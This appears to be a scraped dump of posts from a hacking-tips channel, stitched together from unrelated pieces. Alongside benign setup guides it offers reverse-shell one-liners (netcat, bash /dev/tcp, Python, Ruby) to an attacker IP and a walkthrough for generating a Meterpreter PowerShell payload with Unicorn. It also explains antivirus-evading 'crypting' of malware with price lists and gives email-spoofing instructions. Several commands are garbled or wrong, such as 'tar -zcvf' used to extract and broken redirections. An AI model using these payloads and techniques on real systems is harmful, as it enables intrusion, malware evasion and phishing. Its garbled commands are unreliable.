▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑FREE CTF :

CTF 1: SEGV Hunt - Find a critical buffer overflow bug in glibc. Language: C - Difficulty level:
https://securitylab.github.com/ctf/segv

CTF 2: U-Boot Challenge - Follow in the footsteps of our security research team and discover 13 vulnerabilities un U-Boot. Language: C - Difficulty level:
https://securitylab.github.com/ctf/uboot

CTF 3: XSS-unsafe jQuery plugins - Find variants of jQuery plugins that expose their clients to undocumented XSS (cross-site scripting) vulnerabilities. Language: JavaScript - Difficulty level:
https://securitylab.github.com/ctf/jquery

🦑start tutorials :

https://help.semmle.com/QL/ql-training/intro-to-ql.html

https://help.semmle.com/QL/learn-ql/beginner/ql-tutorials.html

https://lgtm.com/help/lgtm/console/ql-cpp-basic-example

https://blog.semmle.com/python-code-analysis-ql/

@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑real wifi hacking for android no root :

https://play.google.com/store/apps/details?id=com.ngb.wpsconnect&hl=en_US

https://play.google.com/store/apps/details?id=com.tester.wpswpatester&hl=en_US

https://play.google.com/store/apps/details?id=com.halo.wifikey.wifilocating&hl=en_IN

https://www.kali.org/kali-linux-nethunter/

https://play.google.com/store/apps/details?id=wifi.kill.com&hl=en_US

https://play.google.com/store/apps/details?id=com.xti.wifiwarden&hl=en_IN

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Incident Response

* [Cyphon](https://www.cyphon.io/) - Cyphon eliminates the headaches of incident management by streamlining a multitude of related tasks through a single platform. It receives, processes and triages events to provide an all-encompassing solution for your analytic workflow — aggregating data, bundling and prioritizing alerts, and empowering analysts to investigate and document incidents.

* [Demisto](https://www.demisto.com/community/) - Demisto community edition(free) offers full Incident lifecycle management, Incident Closure Reports, team assignments and collaboration, and many integrations to enhance automations (like Active Directory, PagerDuty, Jira and much more...)

* [FIR](https://github.com/certsocietegenerale/FIR/) - Fast Incident Response (FIR) is an cybersecurity incident management platform designed with agility and speed in mind. It allows for easy creation, tracking, and reporting of cybersecurity incidents and is useful for CSIRTs, CERTs and SOCs alike

* [RTIR](https://www.bestpractical.com/rtir/) - Request Tracker for Incident Response (RTIR) is the premier open source incident handling system targeted for computer security teams. We worked with over a dozen CERT and CSIRT teams around the world to help you handle the ever-increasing volume of incident reports. RTIR builds on all the features of Request Tracker

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑To save data in the cache, you need to use the description file manifest file to list the resources to be downloaded and cached

The manifest file can be divided into three parts:

1) CACHE MANIFEST-files listed under this heading will be cached after the first download

2) NETWORK-The files listed under this heading require a connection to the server and will not be cached

3) FALLBACK-The documents listed under this heading specify the fallback page when the page is inaccessible (such as a 404 page)
When online, the user agent will read the manifest every time he visits the page. If it is found to be changed, it will reload all the resources in the list


▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑WINDOWS LASTEST VERSION FROM MICRSOFT OFFICIAL WEBSITE DIRECT :

WIN 7 X64

https://download.microsoft.com/download/E/A/8/EA804D86-C3DF-4719-9966-6A66C9306598/7601.24214.180801-1700.win7sp1_ldr_escrow_CLIENT_HOMEPREMIUM_x64FRE_en-us.iso

WIN 10 2020 OCTOBER X64

https://software-download.microsoft.com/pr/Win10_20H2_EnglishInternational_x64.iso?t=9912e6b9-6607-4d50-920b-1365accf3367&e=1603296019&h=d32bb0ef976921bb6540b49df2562e0a

X32

https://software-download.microsoft.com/pr/Win10_20H2_EnglishInternational_x32.iso?t=9912e6b9-6607-4d50-920b-1365accf3367&e=1603296019&h=f0604e8764288406d5b11ab611710f62

ANYTHING ELSE YOU NEED FROM MICROSOFT.COM REQUEST @Undercode_Testing
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Jenkins project construction process under linux (centos7 as an example)


Install jdk

1. Download jdk and take jdk-8u261-linux-x64.tar.gz installation as an example

2. Create java folder

cd /usr/local mkdir java

3. Then unzip the jdk package

tar -zcvf jdk-8u261-linux-x64.tar.gz

4. Configure environment variables

vi /etc/profile

5. Join

6. Save and exit

:wq

7. Effective configuration file

source /etc/profile

8. Check the jdk version

java -version

2. Install node

1. Go to the official website to download the file that matches your own system:

English website: https://nodejs.org/en/download/

Take download node-v12.13.0-linux-x64.tar as an example

2. Unzip

cd /usr/local tar -xvf node-v12.13.0-linux-x64.tar

3. Check the node version

node -v

3. Install go

1. Download

Download link: https://golang.google.cn/dl/

Take go1.15.2.linux-amd64.tar.gz as an example

2. Unzip

cd /usr/local tar -zcvf go1.15.2.linux-amd64.tar.gz

3. Configure environment variables

vi /etc/profile

4. Join

Note: go get cannot be accessed directly in China, so you must first set up a proxy (to solve the problem that some packages of go cannot be downloaded)

1). Enable the go modules feature to open the proxy mode

export GO111MODULE=on

2). Set the GOPROXY environment variable to set the proxy address

export GOPROXY=https://goproxy.io

5. Save and exit

:wq

6. Effective configuration file

source /etc/profile

7. View the go version

go version

Install jenkins

1. Download linux jenkins, official website address https://pkg.jenkins.io/redhat/

2. Create a folder in the root directory

mkdir jenkins

3. After the download is complete, put jenkins-2.174-1.1.noarch.rpm into the jenkins directory

Enter the jenkins directory to decompress and decompress the command:

rpm -ivh jenkins-2.174-1.1.noarch.rpm

After decompression is successful, check the directory where jenkins is installed

whereis jenkins

4. Find the jdk installation path

ps -ef|grep java


5. Modify the /etc/init.d/jenkins file and configure the jdk installation path

vi /etc/init.d/jenkins

6. Start jenkins

7. Visit http://server IP:8080/ and enter the jenkins password

8. Install Jenkins custom recommended plugins

9. Create Jenkins user

10. Configure git, enter the global tool configuration, so far jenkins is installed, and then log in


Your not allowed to copy our tutorials!
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Reverse Shell Commands
The following are some useful commands to start listeners and reverse shells in Linux and Windows-based systems.

## Netcat Linux Reverse Shell
nc 10.10.10.10 888 -e /bin/sh
* 10.10.10.10 is the IP address of the machine you want the victim to connect to.
* 888 is the port number (change this to whatever port you would like to use, just make sure that no firewall is blocking it).

## Netcat Linux Reverse Shell
nc 10.10.10.10 888 -e cmd.exe
* 10.10.10.10 is the IP address of the machine you want the victim to connect to.
* 888 is the port number (change this to whatever port you would like to use, just make sure that no firewall is blocking it).

## Using Bash
bash -i & /dev/tcp/10.10.10.10/888 0 &1

## Using Python
python -c 'import socket, subprocess, os; s=socket. socket (socket.AF_INET, socket.SOCK_STREAM); s.connect(("10.10.10.10",888)); os.dup2(s.fileno(),0); os.dup2(s.fileno(l,1); os.dup2(s.fileno(),2); p=subprocess.call(["/bin/sh","-i"]);'

## Using Ruby
ruby -rsocket -e'f=TCPSocket.open("10.10.10.10",888).to_i; exec sprintf("/bin/sh -i &%d &%d 2 &%d",f,f,f)'


Your not allowed to copy our tutorials!
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑for any debian base os


A) Install the Metasploit framework
Metasploit is a Unicorn dependency. Before installing Unicorn, we'll take a quick look at the Metasploit installation to make sure we have the latest version. For this we use the repository on GitHub.

Kali does a great job of keeping Metasploit stable in its reps, but we'll show you how to install the most recent version. First, uninstall any old versions of Metasploit that you may already have installed in Kali.

apt-get remove metasploit-framework
Then use cURL to download the Metasploit installer.

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
Update the permissions for the msfinstall file to make sure it will execute.

chmod 755 msfinstall
Run the installer script using the command ./msfinstall.

./msfinstall

B) Install Unicorn
Once Metasploit has been installed, you can install Unicorn by cloning the repository from GitHub using the git clone command github.com/trustedsec/unicorn.

git clone https://github.com/trustedsec/unicorn


Now change to the new Unicorn directory using the cd command.

cd unicorn/
Use ./unicorn.py —help to view the available Unicorn options and detailed descriptions of each attack.

./unicorn.py --help

Generate the payload
To create payload with Unicorn use below command.

./unicorn.py windows/meterpreter/reverse_https
Unicorn will use the reverse_https Metasploit module to connect to the hacker's IP using the specified port.

[*] Generating the payload shellcode.. This could take a few seconds/minutes as we create the shellcode

During payload generation, Unicorn will create two new files. The first will be the powershell_attack.txt file, the contents of which can be viewed with the cat powershell_attack.txt command. This command will display the PowerShell code that will run on the target Windows 10 machine and create a connection to meterpreter.

cat powershell_attack.txt


Your not allowed to copy our tutorials!
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Crypt / Why? / Types / Issue price :

1) Crypt, crypt - the process of hiding your malicious code from antiviruses (hereinafter referred to as AB).

2) This is the process of modifying the code of your file (exe / dll) in such a way that the file itself remains operational and all antiviruses will consider that the file is harmless to the system.

3) This is accomplished in a variety of ways. The simplest ones are adding garbage sections or false calls and jumps to the file code. This simplest method has long lost its relevance due to the development of antiviruses and logistic methods of file analysis (heuristic analysis).

4) Now more complex methods are used, which include a huge complex of file file modifications. And the more sophisticated the methods, the longer your file will remain "clean" for AB.

🦑There are two types of such crypts:

1) Manual - this is when your file is modified manually, individually for the task. It is believed that this method gives a better quality result and the file stays "clean" longer.

2) With the help of a cryptor, this is an automatic method in which a program is written in advance, which produces a number of modifications standard for each file. This method is considered less reliable because the procedures performed on the file are the same for all files. This, in turn, means that if one of the files is caught by the AV, then all the others will soon begin to be detected (identified by AV as malicious).

3) With each such modification (process), the file size is increased by a certain number of kilobytes. This size is different for each service / cryptor and can vary from 5kb to 300kb. Less is better. The extra dimension is called STAB. The price ranges from $ 5 - $ 50. Automatic (using a crypter costs $ 5-15), manual costs $ 25-50.

Your not allowed to copy our tutorials!
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑How to find out which package contains a file ?

If you compile programs from source codes, then you have probably encountered compilation errors when the program does not find any file and compilation fails. What to do in this situation? It is clear that you need to install the package that contains the required file. But how do you know the name of this package?

1) With the apt-file program, you can search by filenames in packages (both installed and not). It can also show all files in the package.

Program installation:

1) sudo apt install apt-file

2) Immediately after installation, the program data cache is empty. To update it, you need to run the command:

sudo apt-file update

3) When everything is ready, then the search is carried out as follows:
For example, search for the ffi.h file:


apt-file search ffi.h

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

DETAILED new PROXIES LIST for you -_=

https://pastebin.com/8qfX8ksF

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑How to create a bootable USB stick from Ubuntu Terminal


Step 1: download the Ubuntu 18.04 LTS ISO
Open the official Ubuntu website in any browser and download the Ubuntu ISO image from the following link:

https://ubuntu.com/#download

1) Click on the Ubuntu package you want to install. In this case the link 18.04 LTS was selected in the Ubuntu Server section.

2) Select "Save File" and click OK. The .iso file will be saved in the Downloads folder.

Step 2: launch Terminal

3) Open the Ubuntu command line tool called Terminal. This can be done by searching in the Ubuntu Application Launcher or by pressing Ctrl + Alt + T.


Step 3: unblock USB if mounted

4) Before writing to a USB stick, you need to make sure that it has not been automatically mounted on your Ubuntu system. Insert the USB stick into the device and run the following command to get the name of the USB device:

$ df

5) The last line of the output contains a list of the USB devices mounted on the Ubuntu system.

6) Write down the device name. In this case, it is / dev / sdb1. Make a note of the path to that device, in this case / media / sana / Ubuntu-Server 18.04.2 LTS amd64.

🦑There are two ways to unmount USB in Ubuntu:

1.By specifying a path:

$ sudo umount / path / where / mounted
For example, in this case, you need the following command:

$ sudo umount / media / sana / 'Ubuntu-Server 18.04.2 LTS amd64'


2. You can use the device name to unmount it:

$ sudo umount / device / name

as exmaple the command will be as follows:

$ sudo umount / dev / sdb1

Step 4: create a bootable Ubuntu stick
When the USB is unmounted, you know the name of the ISO image, the path to it, the name of the device, one command is enough to create a bootable USB flash drive. This is the dd command:

$ sudo dd bs = 4M if = / path / to / ISOfile of = / dev / sdx status = progress oflag = sync

as example , the following command is used to burn Ubuntu ISO to a USB flash drive:

$ sudo dd bs = 4M if = / home / sana / Downloads / ubuntu-18.04.2-live-server-amd64.iso of = / dev / sdb1 status = progress oflag = sync
Burning the ISO image to the USB flash drive will start

After a while, the bootable USB drive will be ready.

Your not allowed to copy our tutorials!
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑NEW MAIL SPOOFING Email servers do not accept connections from normal computers. In an effort to limit the amount of spam, most MTAs will only accept connections from relays that have a fully-qualified domain name (FQDN). As such, the easiest way to use this project is from a Linux Virtual Private Server. There are several free or cheap options available, such as Digital Ocean, Linode, and Amazon EC2.

Once the server is set up, the next step is to install and start an SMTP server. This is required to actually send the spoofed emails. I personally use Postfix, though any will do. This script defaults to using localhost:25 for the mail server.

1) On Kali Linux, the easiest method of doing this is:

2) sudo apt-get install postfix sudo service postfix start

» clone https://github.com/lunarca/SimpleEmailSpoofer

3) When installing postfix, specify Internet-facing and provide the correct FQDN when prompted.


4) pip install -r requirements.txt

5) Basic Usage
Add the desired contents of the email in HTML format to an HTML file. Then, execute the following command:

./SimpleEmailSpoofer.py -e [Path to Email file] -t [To address] -f [From address] -n [From name] -j [Email subject]

Additional flags can be found by running

./SimpleEmailSpoofer.py -h


Your not allowed to copy our tutorials!
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑A simple, lightweight JavaScript API for handling cookies

Works in all browsers
Accepts any character
Heavily tested
No dependency
Supports ES modules
Supports AMD/CommonJS
RFC 6265 compliant
Useful Wiki
Enable custom encoding/decoding
< 800 bytes gzipped!

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

1) git clone https://github.com/js-cookie/js-cookie.git

2) $ npm i js-cookie

3) to use

Note the different extensions: .mjs denotes the ES module, whereas .js is the UMD one.

Example for how to load the ES module in a browser:

<script type="module" src="/path/to/js.cookie.mjs"></script>
<script type="module">
import Cookies from '/path/to/js.cookie.mjs'

Cookies.set('foo', 'bar')
</script>

5) Not all browsers support ES modules natively yet. For this reason the npm package/release provides both the ES and UMD module variant and you may want to include the ES module along with the UMD fallback to account for this:

<script type="module" src="/path/to/js.cookie.mjs"></script>
<script nomodule defer src="/path/to/js.cookie.js"></script>
Here we're loading the nomodule script in a deferred fashion, because ES modules are deferred by default. This may not be strictly necessary depending on how you're using the library.

Your not allowed to copy our tutorials!
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

sock 5 list

https://pastebin.com/JtvSKc3H